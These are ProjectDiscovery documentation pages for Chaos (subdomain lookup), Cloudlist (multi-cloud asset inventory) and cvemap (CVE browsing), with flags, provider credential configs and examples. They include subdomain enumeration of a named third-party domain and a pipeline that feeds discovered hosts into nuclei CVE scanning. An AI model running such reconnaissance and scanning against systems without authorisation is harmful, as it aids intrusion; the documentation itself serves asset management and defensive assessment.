* The API is rate-limited to 60 request / min / ip
* Chaos API **only** supports domain name to query.
# Chaos Usage
Source: https://docs.projectdiscovery.io/tools/chaos/usage
Learn Chaos usage including flags and filters
## Access help
Use `chaos -h` to display all of the help options.
## Chaos options
| Flag | Description | Example |
| ----------------------- | ---------------------------------------- | ------------------------------- |
| `-d` | Domain to find subdomains for | `chaos -d uber.com` |
| `-count` | Show statistics for the specified domain | `chaos -d uber.com -count` |
| `-o` | File to write output to (optional) | `chaos -d uber.com -o uber.txt` |
| `-json` | Print output as json | `chaos -d uber.com -json` |
| `-key` | Chaos key for API | `chaos -key API_KEY` |
| `-dL` | File with list of domains (optional) | `chaos -dL domains.txt` |
| `-silent` | Make the output silent | `chaos -d uber.com -silent` |
| `-version` | Print current version of chaos client | `chaos -version` |
| `-verbose` | Show verbose output | `chaos -verbose` |
| `-update` | updates to latest version | `chaos -up` |
| `-disable-update-check` | disables automatic update check | `chaos -duc` |
# Cloudlist Install
Source: https://docs.projectdiscovery.io/tools/cloudlist/install
Learn how to install Cloudlist and get started
Enter the command below in a terminal to install ProjectDiscovery's Cloudlist using Go.
```bash
go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest
```
```bash
https://github.com/projectdiscovery/cloudlist/releases/
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* Cloudlist requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/cloudlist`
# Cloudlist Overview
Source: https://docs.projectdiscovery.io/tools/cloudlist/overview
A multi-cloud tool to identify assets across cloud service providers
Cloudlist is a multi-cloud tool for getting Assets from Cloud Providers. Cloudlist is designed for the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.
## Features
* List Cloud assets with multiple configurations
* Multiple Cloud providers support
* Multiple output format support
* Multiple filters support
* Highly extensible making adding new providers a breeze
* **stdout** support to work with other tools in pipelines
## Support
Questions about using Cloudlist? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Cloudlist Providers
Source: https://docs.projectdiscovery.io/tools/cloudlist/providers
Supported cloud providers
This guide offers insights into each supported provider, enabling you to leverage Cloudlist's capabilities to their fullest extent for comprehensive asset visibility and control.
## Major Cloud Providers
### AWS (Amazon Web Services)
Supported AWS Services:
* [EC2](https://aws.amazon.com/ec2/)
* [Route53](https://aws.amazon.com/route53/)
* [S3](https://aws.amazon.com/s3/)
* [Cloudfront](https://aws.amazon.com/cloudfront/)
* [ECS](https://aws.amazon.com/ecs/)
* [EKS](https://aws.amazon.com/eks/)
* [ELB](https://aws.amazon.com/elasticloadbalancing/)
* [ELBv2](https://aws.amazon.com/elasticloadbalancing/)
* [Lambda](https://aws.amazon.com/lambda/)
* [Lightsail](https://aws.amazon.com/lightsail/)
* [Apigateway](https://aws.amazon.com/api-gateway/)
**Example Config**:
Amazon Web Services can be integrated by using the following configuration block.
```yaml
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
# assume_role_name is the name of the role to assume (optional)
assume_role_name: $AWS_ASSUME_ROLE_NAME
# account_ids is the aws account ids which has similar assumed role name (optional)
account_ids:
- $AWS_ACCOUNT_ID_1
- $AWS_ACCOUNT_ID_2
```
`aws_access_key` and `aws_secret_key` can be generated in the IAM console. We recommend creating a new IAM user with `Read Only` permissions and providing the access token for the user.
Scopes Required:
The following scopes can directly be provided to the IAM user.
```
EC2 - AmazonEC2ReadOnlyAccess
Route53 - AmazonRoute53ReadOnlyAccess
S3 - AmazonS3ReadOnlyAccess
Lambda - AWSLambda_ReadOnlyAccess
ELB - ElasticLoadBalancingReadOnly
Cloudfront - CloudFrontReadOnlyAccess
```
To also support other services, a custom policy document is provided which can directly be copy-pasted to the role to allow correct and minimal permissions.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "RequiredReadPermissions",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"ec2:DescribeRegions",
"route53:ListHostedZones",
"route53:ListResourceRecordSets",
"s3:ListAllMyBuckets",
"lambda:ListFunctions",
"elasticloadbalancing:DescribeLoadBalancers",
"elasticloadbalancing:DescribeTargetGroups",
"elasticloadbalancing:DescribeTargetHealth",
"cloudfront:ListDistributions",
"ecs:ListClusters",
"ecs:ListServices",
"ecs:ListTasks",
"ecs:DescribeTasks",
"ecs:DescribeContainerInstances",
"eks:ListClusters",
"eks:DescribeCluster",
"apigateway:GET",
"lightsail:GetInstances",
"lightsail:GetRegions"
],
"Resource": "*"
}
]
}
```
**References:**
1. [https://docs.aws.amazon.com/IAM/latest/UserGuide/reference\_policies\_examples\_iam\_read-only-console.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_iam_read-only-console.html)
2. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_access-keys.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
3. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp\_request.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html)
* Aws Assume Role:
* [https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html](https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html)
* [https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role](https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role)
### GCP (Google Cloud Platform)
Supported GCP Services:
* [Cloud DNS](https://cloud.google.com/dns)
* [Kubernetes Engine](https://cloud.google.com/kubernetes-engine)
* [Compute Engine](https://cloud.google.com/products/compute)
* [Bucket](https://cloud.google.com/storage)
* [Cloud Functions](https://cloud.google.com/functions)
* [Cloud Run](https://cloud.google.com/run)
**Example Config:**
Google Cloud Platform can be integrated by using the following configuration block.
```yaml
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
```
`gcp_service_account_key` can be retrieved by creating a new service account. To do so, create service account with Read Only access to `cloudresourcemanager` and `dns` scopes in IAM. Next, generate a new account key for the Service Account by following steps in Reference 2. This should give you a json which can be pasted in a single line in the `gcp_service_account_key`.
Scopes Required: Cloud DNS, GKE
References:
1. [https://cloud.google.com/iam/docs/service-account-overview](https://cloud.google.com/iam/docs/service-account-overview)
### Azure
Supported Azure Services:
* Virtual Machines
**Example Config:**
Microsoft Azure can be integrated by using the following configuration block.
```yaml
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of registered application of the azure account (not requuired if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
```
`tenant_id`, `client_id`, `client_secret` can be obtained/generated from `All services` > `Azure Active Directory` > `App registrations`
`subscription_id` can be retrieved from `All services` > `Subscriptions`
To use cli auth set `use_cli_auth` value to `true` and run `az login` in the terminal
References:
1. [https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli](https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli)
2. [https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az\_ad\_sp\_create\_for\_rbac](https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az_ad_sp_create_for_rbac)
3. [https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli](https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli)
### Alibaba Cloud
Suppoted Alibaba Cloud Services:
* ECS Instances
**Example Config:**
Alibaba Cloud can be integrated by using the following configuration block.
```yaml
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
```
Alibaba Cloud Access Key ID and Secret can be created by visiting [https://ram.console.aliyun.com/manage/ak](https://ram.console.aliyun.com/manage/ak)
References:
1. [https://www.alibabacloud.com/help/faq-detail/142101.htm](https://www.alibabacloud.com/help/faq-detail/142101.htm)
2. [https://www.alibabacloud.com/help/doc-detail/53045.htm](https://www.alibabacloud.com/help/doc-detail/53045.htm)
## VPS & PaaS Hosting Providers
### DO (DigitalOcean)
Supported DigitalOcean Services:
* Instances
**Example Config:**
Digitalocean can be integrated by using the following configuration block.
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
```
`digitalocean_token` can be generated from the Digitalocean Control Panel. We recommend only giving Read Access to the token.
References:
1. [https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/](https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/)
### SCW (Scaleway)
Supported Scaleway Services:
* Instances
**Example Config:**
Scaleway can be integrated by using the following configuration block.
```yaml
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
```
`scaleway_access_key` and `scaleway_access_token` can be generated from the Credentials Options in scaleway console.
References -
1. [https://www.scaleway.com/en/docs/generate-api-keys/](https://www.scaleway.com/en/docs/generate-api-keys/)
### Heroku
Supported Heroku Services:
* Applications
**Example Config:**
Heroku can be integrated by using the following configuration block.
```yaml
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
```
`heroku_api_token` can be generated from [https://dashboard.heroku.com/account/applications/authorizations/new](https://dashboard.heroku.com/account/applications/authorizations/new)
It can also be created with the Heroku CLI by running:
```bash
$ heroku authorizations:create -d "brief description of token"
Creating OAuth Authorization... done
Client:
ID: a6e98151-f242-4592-b107-25fbac5ab410
Description: brief description of token
Scope: global
Token: cf0e05d9-4eca-4948-a012-b9xxxxxxxxxx
Updated at: Fri Jun 16 2021 13:26:56 GMT-0700 (PDT) (less than a minute ago)
```
References:
1. [https://devcenter.heroku.com/articles/platform-api-quickstart#authentication](https://devcenter.heroku.com/articles/platform-api-quickstart#authentication)
### Linode
Supported Linode Services:
* Instances
**Example Config:**
Linode can be integrated by using the following configuration block.
```yaml
- provider: linode # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
```
`linode_personal_access_token` can be created from [https://cloud.linode.com/id/tokens](https://cloud.linode.com/id/tokens). Minimum scope needed is `Read Only` for `Linodes` resource.
References:
1. [https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token](https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token)
## CDN & DNS Management
### Fastly
Supported Fastly Services:
* Services
**Example Config:**
Fastly can be integrated by using the following configuration block.
```yaml
- # provider is the name of the provider
provider: fastly
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
```
`fastly_api_key` can be generated from [https://manage.fastly.com/account/personal/tokens](https://manage.fastly.com/account/personal/tokens)
References -
1. [https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens](https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens)
### Namecheap
Supported Namecheap Services:
* Domain List
**Example Config:**
Namecheap can be integrated by using the following configuration block.
```yaml
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
```
Namecheap API Access can be enabled by visiting [https://ap.www.namecheap.com/settings/tools/apiaccess/](https://ap.www.namecheap.com/settings/tools/apiaccess/) and then:
* Toggle ON API Access switch
* Add your public IP to Whitelistted IPs
References:
1. [https://www.namecheap.com/support/api/intro/](https://www.namecheap.com/support/api/intro/)
* Enabling API Access
* Whitelisting IP
### Cloudflare
Supported Cloudflare Services:
* DNS
**Example Config:**
Cloudflare can be integrated by using the following configuration block.
```yaml
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
```
`api_key` can be generated from Cloudflare API Key manager. It needs to be Global API Key due to limitation of cloudflare new API tokens.
References:
1. [https://developers.cloudflare.com/api/keys](https://developers.cloudflare.com/api/keys)
### Hetzner Cloud
Supported Hetzner Cloud Services:
* Instances
**Example Config:**
Hetzner Cloud can be integrated by using the following configuration block.
```yaml
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# auth_token is the is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
```
References:
1. [https://docs.hetzner.cloud/#authentication](https://docs.hetzner.cloud/#authentication)
## Infrastructure Automation & Management
### Kubernetes (K8s)
Supported Kubernetes Services:
* Services
* Ingresses
**Example Config:**
To integrate Kubernetes, utilize the configuration block outlined below. This block allows you to specify Kubernetes connection details either through a file path or directly by providing the encoded kubeconfig content. If both kubeconfig\_file and kubeconfig\_encoded are specified, the kubeconfig\_encoded will take precedence.
```yaml
- provider: kubernetes # provider is the name of the provider
# id is the name of the provider id
id: staging
# kubeconfig_file is the path of kubeconfig file
kubeconfig: path/to/kubeconfig
# context is the context to be used from kubeconfig file
context:
```
References:
1. [https://www.redhat.com/sysadmin/kubeconfig](https://www.redhat.com/sysadmin/kubeconfig)
2. [https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html](https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html)
3. [https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information](https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information)
4. [https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store\_info](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store_info)
### Hashicorp Tools
With Cloudlist you can get assets from nomad, consul and terraform. Cloudlist can query Nomad and Consul directly, and will use the Terraform state file to list Terraform created assets.
#### Nomad
Hashicorp Nomad can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: nomad # provider is the name of the provider
# nomad_url is the url for nomad server
nomad_url: http:/127.0.0.1:4646/
# nomad_ca_file is the path to nomad CA file
# nomad_ca_file: .pem
# nomad_cert_file is the path to nomad Certificate file
# nomad_cert_file: .pem
# nomad_key_file is the path to nomad Certificate Key file
# nomad_key_file: .pem
# nomad_token is the nomad authentication token
# nomad_token:
# nomad_http_auth is the nomad http auth value
# nomad_http_auth:
```
Specifying https in the `nomad_url` automatically turns SSL to on. All the fields are optional except the `nomad_url`.
References:
1. [https://www.nomadproject.io/api-docs](https://www.nomadproject.io/api-docs)
#### Consul
Hashicorp Consul can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: consul # provider is the name of the provider
# consul_url is the url for consul server
consul_url: http://localhost:8500/
# consul_ca_file is the path to consul CA file
# consul_ca_file: .pem
# consul_cert_file is the path to consul Certificate file
# consul_cert_file: .pem
# consul_key_file is the path to consul Certificate Key file
# consul_key_file: .pem
# consul_http_token is the consul authentication token
# consul_http_token:
# consul_http_auth is the consul http auth value
# consul_http_auth:
```
Specifying https in the `consul_url` automatically turns SSL to on. All the fields are optional except the `consul_url`.
References:
1. [https://www.consul.io/api-docs](https://www.consul.io/api-docs)
#### Terraform
**Example Config:**
Terraform can be integrated by using the following configuration block.
```yaml
- provider: terraform # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
#tf_state_file is the location of terraform state file (terraform.tfsate)
tf_state_file: path/to/terraform.tfstate
```
### OpenStack
Supported OpenStack Services:
* Instances
**Example Config:**
```yaml
- provider: openstack # provider is the name of the provider
# id is the name of the provider id
id: staging
# identity_endpoint is OpenStack identity endpoint used to authenticate
identity_endpoint: $OS_IDENTITY_ENDPOINT
# domain_name is OpenStack domain name used to authenticate
domain_name: $OS_DOMAIN_NAME
# tenant_name is OpenStack project name
tenant_name: $OS_TENANT_NAME
# username is OpenStack username used to authenticate
username: $OS_USERNAME
# password is OpenStack password used to authenticate
password: $OS_PASSWORD
```
# Running Cloudlist
Source: https://docs.projectdiscovery.io/tools/cloudlist/running
Learn about running Cloudlist with examples and support details
For all of the flags and options available for `cloudlist` be sure to check out the [Usage](/tools/cloudlist/usage) page. On this page you can find some examples with output, details of what 'cloudlist' supports, and details on configuration.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
```
cloudlist
```
This will list all the assets from configured providers in the configuration file. Specific providers and asset type can also be specified using `provider` and `id` filter.
```console
cloudlist -provider aws,gcp
________ _____ __
/ ____/ /___ __ ______/ / (_)____/ /_
/ / / / __ \/ / / / __ / / / ___/ __/
/ /___/ / /_/ / /_/ / /_/ / / (__ ) /_
\____/_/\____/\__,_/\__,_/_/_/____/\__/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Listing assets from AWS (prod) provider.
example.com
example2.com
example3.com
1.1.1.1
2.2.2.2
3.3.3.3
4.4.4.4
5.5.5.5
6.6.6.6
[INF] Found 2 hosts and 6 IPs from AWS service (prod)
```
## Running cloudlist with Nuclei
Scanning assets from various cloud providers with nuclei for security assessments:-
```bash
cloudlist -silent | httpx -silent | nuclei -t cves/
```
# Supported providers
For a full list of supported cloud providers, see [Cloud Providers](/tools/cloudlist/providers).
# Configuration file
The default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml` and has the following contents as an example. In order to run this tool, the keys need to updated in the config file for the desired providers.
## Example Provider Config
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of registered application of the azure account (not requuired if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
- provider: linode # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
- provider: fastly # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
- provider: terraform # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
#tf_state_file is the location of terraform state file (terraform.tfsate)
tf_state_file: path/to/terraform.tfstate
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# auth_token is the is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
- provider: nomad # provider is the name of the provider
# nomad_url is the url for nomad server
nomad_url: http:/127.0.0.1:4646/
# nomad_ca_file is the path to nomad CA file
# nomad_ca_file: .pem
# nomad_cert_file is the path to nomad Certificate file
# nomad_cert_file: .pem
# nomad_key_file is the path to nomad Certificate Key file
# nomad_key_file: .pem
# nomad_token is the nomad authentication token
# nomad_token:
# nomad_http_auth is the nomad http auth value
# nomad_http_auth:
- provider: consul # provider is the name of the provider
# consul_url is the url for consul server
consul_url: http://localhost:8500/
# consul_ca_file is the path to consul CA file
# consul_ca_file: .pem
# consul_cert_file is the path to consul Certificate file
# consul_cert_file: .pem
# consul_key_file is the path to consul Certificate Key file
# consul_key_file: .pem
# consul_http_token is the consul authentication token
# consul_http_token:
# consul_http_auth is the consul http auth value
# consul_http_auth:
- provider: openstack # provider is the name of the provider
# id is the name of the provider id
id: staging
# identity_endpoint is OpenStack identity endpoint used to authenticate
identity_endpoint: $OS_IDENTITY_ENDPOINT
# domain_name is OpenStack domain name used to authenticate
domain_name: $OS_DOMAIN_NAME
# tenant_name is OpenStack project name
tenant_name: $OS_TENANT_NAME
# username is OpenStack username used to authenticate
username: $OS_USERNAME
# password is OpenStack password used to authenticate
password: $OS_PASSWORD
- provider: kubernetes # provider is the name of the provider
# id is the name of the provider id
id: staging
# kubeconfig_file is the path of kubeconfig file
kubeconfig: path/to/kubeconfig
# context is the context to be used from kubeconfig file
context:
```
# Cloudlist as a library
It's possible to use the library directly in your go programs. The following code snippets outline how to list assets from all or given cloud provider.
```go
package main
import (
"context"
"log"
"github.com/projectdiscovery/cloudlist/pkg/inventory"
"github.com/projectdiscovery/cloudlist/pkg/schema"
)
func main() {
inventory, err := inventory.New(schema.Options{
schema.OptionBlock{"provider": "digitalocean", "digitalocean_token": "ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242"},
})
if err != nil {
log.Fatalf("%s\n", err)
}
for _, provider := range inventory.Providers {
resources, err := provider.Resources(context.Background())
if err != nil {
log.Fatalf("%s\n", err)
}
for _, resource := range resources.Items {
_ = resource // Do something with the resource
}
}
}
```
# Cloudlist Usage
Source: https://docs.projectdiscovery.io/tools/cloudlist/usage
Learn Cloudlist usage including flags and filters
## Access help
Use `cloudlist -h` to display all of the help options.
## Cloudlist options
```yaml
Cloudlist is a tool for listing Assets from multiple cloud providers.
Usage:
./cloudlist [flags]
Flags:
CONFIGURATION:
-config string cloudlist flag config file (default "$HOME/.config/cloudlist/config.yaml")
-pc, -provider-config string provider config file (default "$HOME/.config/cloudlist/provider-config.yaml")
FILTERS:
-p, -provider value display results for given providers (comma-separated) (default linode,fastly,heroku,terraform,digitalocean,consul,cloudflare,hetzner,nomad,do,scw,openstack,alibaba,aws,gcp,namecheap,kubernetes,azure)
-id string[] display results for given ids (comma-separated)
-host display only hostnames in results
-ip display only ips in results
-s, -service value query and display results from given service (comma-separated)) (default cloudfront,gke,domain,compute,ec2,instance,cloud-function,app,eks,consul,droplet,vm,ecs,fastly,alb,s3,lambda,elb,cloud-run,route53,publicip,dns,service,nomad,lightsail,ingress,apigateway)
-ep, -exclude-private exclude private ips in cli output
UPDATE:
-up, -update update cloudlist to latest version
-duc, -disable-update-check disable automatic cloudlist update check
OUTPUT:
-o, -output string output file to write results
-json write output in json format
-version display version of cloudlist
-v display verbose output
-silent display only results in output
```
# Installing cvemap
Source: https://docs.projectdiscovery.io/tools/cvemap/install
Learn about how to install and get started with cvemap
To access the cvemap API data you need a ProjectDiscovery Cloud Platform (PDCP) account and API key. Check out [Running](/tools/cvemap/running) for details. Enter the command below in a terminal to install ProjectDiscovery's cvemap using Go.
```bash
go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest
```
## Installation Notes
* cvemap requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/cvemap`
# cvemap overview
Source: https://docs.projectdiscovery.io/tools/cvemap/overview
A structured and easy way to navigate public CVE sources
## What is **cvemap?**
cvemap is a tool that provides a structured and easily navigable way to explore CVEs from the command line.
ProjectDiscovery's cvemap combines data from multiple public sources including:
* NVD (NIST) database of CVEs
* CISA database of CVEs and Known Exploited Vulnerabilities (KEVs)
* Data from HackerOne's CVE Discovery about the most frequently reported CVEs in their system
* Data about EPSS scoring and the mapping to Common Platform Enumeration (CPE)
* Data about public PoCs that might be available on GitHub along with the status of any Nuclei Template for fingerprinting the CVE
Read more about cvemap [on our blog](https://blog.projectdiscovery.io/announcing-cvemap-from-projectdiscovery/)
## Features and capabilities
* CVE Dataset Search & Query
* CVE to EPSS Mapping
* CVE to KEV Mapping
* CVE to CPE Mapping
* CVE to GitHub POCs Mapping
* CVE to Nuclei Template Mapping
* CVE to HackerOne report Mapping
* Customizable Filters on CVE data
* STDIN Input / JSONL Output
## Support
Questions about using cvemap? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running cvemap
Source: https://docs.projectdiscovery.io/tools/cvemap/running
Learn about running cvemap with examples including commands and output
For all of the flags and options available for `cvemap` be sure to check out the [Usage](/tools/cvemap/usage) page. On this page we'll share examples running `cvemap` with specific flags and goals
and the output you can expect from each.
*If you have questions, reach out to us through [Help](/help).*
## Prerequisites for cvemap
Before using cvemap, you'll need to get a ProjectDiscovery Cloud Platform (PDCP) account and API key so that you can access the cvemap API data.
Navigate to [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) and click “Sign Up” (or “Sign In” if you already have a PDCP account).
Once signed into ProjectDiscovery Cloud Platform, you can navigate to [https://cloud.projectdiscovery.io/?ref=api\_key](https://cloud.projectdiscovery.io/?ref=api_key) to find your API Key.
Use the copy button to copy your API Key - we nee dthis to authenticate your install
To authenticate your install of cvemap, run
```bash
cvemap -auth
```
When prompted, paste the key you obtained above.
## Basic Examples
By default, `cvemap` lists all the known exploited vulnerabilities based CVEs published by [cisa](https://www.cisa.gov/known-exploited-vulnerabilities-catalog).
### List top known exploited vulnerabilities
```bash
$ cvemap -limit 10
______ _____ ____ ___ ____ ____
/ ___/ | / / _ \/ __ \__ \/ __ \/ __ \
/ /__ | |/ / __/ / / / / / /_/ / /_/ /
\___/ |___/\___/_/ /_/ /_/\__,_/ .___/
/_/
projectdiscovery.io
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | AGE |
|---------------|------|----------|---------|-----------------------|----------|-----|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | 18 |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | 38 |
| CVE-2023-4966 | 7.5 | HIGH | 0.92267 | netscaler_application | ✅ | 26 |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | 54 |
| CVE-2023-46748| 8.8 | HIGH | 0.00607 | | ❌ | 10 |
| CVE-2023-46747| 9.8 | CRITICAL | 0.95304 | | ✅ | 10 |
| CVE-2023-46604| 10 | CRITICAL | 0.01596 | | ✅ | 9 |
